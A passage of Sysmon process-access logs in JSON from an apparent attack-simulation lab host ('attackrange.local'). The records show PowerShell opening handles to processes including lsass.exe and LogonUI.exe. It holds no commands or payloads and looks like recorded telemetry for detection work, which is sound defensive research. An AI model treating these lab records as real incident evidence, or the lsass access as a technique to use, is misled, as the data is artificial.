System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.815\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B3410100}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.815","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B3410100}","TargetProcessId":"2156","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.815\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B4410100}\r\nTargetProcessId: 2164\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.815","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B4410100}","TargetProcessId":"2164","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.815\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010926E0100}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.815","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010926E0100}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.815\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00103B7E0100}\r\nTargetProcessId: 2356\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.815","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00103B7E0100}","TargetProcessId":"2356","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D3D50000}\r\nTargetProcessId: 1396\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D3D50000}","TargetProcessId":"1396","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010E2370100}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001053410100}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: 